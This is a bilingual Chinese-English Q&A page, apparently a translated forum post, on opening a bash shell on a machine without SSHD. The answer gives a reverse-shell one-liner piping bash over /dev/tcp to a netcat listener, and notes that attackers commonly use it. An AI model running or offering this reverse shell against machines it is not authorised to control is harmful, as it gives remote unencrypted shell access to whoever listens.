如何在接收端打开没有SSHD的外壳? [英] How to open a shell without SSHD on the receiving end?

问题描述

我有一台没有SSHD的计算机，我想从一台远程计算机(我可以完全控制)上打开该计算机上的bash外壳.

I have a machine without SSHD and I want to open a bash shell on this machine from a remote machine (that I can fully control).

由于我在受限计算机上安装了SSH，因此我配置了反向代理:

Since I have SSH on my limited machine, I configured a reverse proxy:

$ ssh -R 19999:localhost:22 remoteuser@remotemachine

现在，我的完全控制"计算机到有限"计算机的端口19999上都有连接.如何使用此设置打开外壳?

Now I have a connection on port 19999 from my "fully control" machine to my "limited" machine. How would I open a shell with this setup?

推荐答案

您可以将输入从某个端口直接传递到bash.滥用软件中的各种错误时，这是​​常见的做法.例如，在完全访问权限的计算机上运行:

You can pipe the input from some port directly to the bash. This is common practice when misusing various bugs in software. For example, run on your full-access machine:

nc -lvp 9999

在受限机器上

/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1

192.168.122.1是完全控制计算机的IP.

Where the 192.168.122.1 is the IP of the full-control machine.

这将为您提供第一台计算机中第二台计算机的外壳.但是请注意，该连接未加密.如果要加密，则需要添加TCP转发步骤(与上面建议的类似).

This will give you a shell of the second machine in the first one. But note that the connection is not encrypted. If you want encryption, you would need to add the TCP forwarding step (similar as you propose above).

这篇关于如何在接收端打开没有SSHD的外壳?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！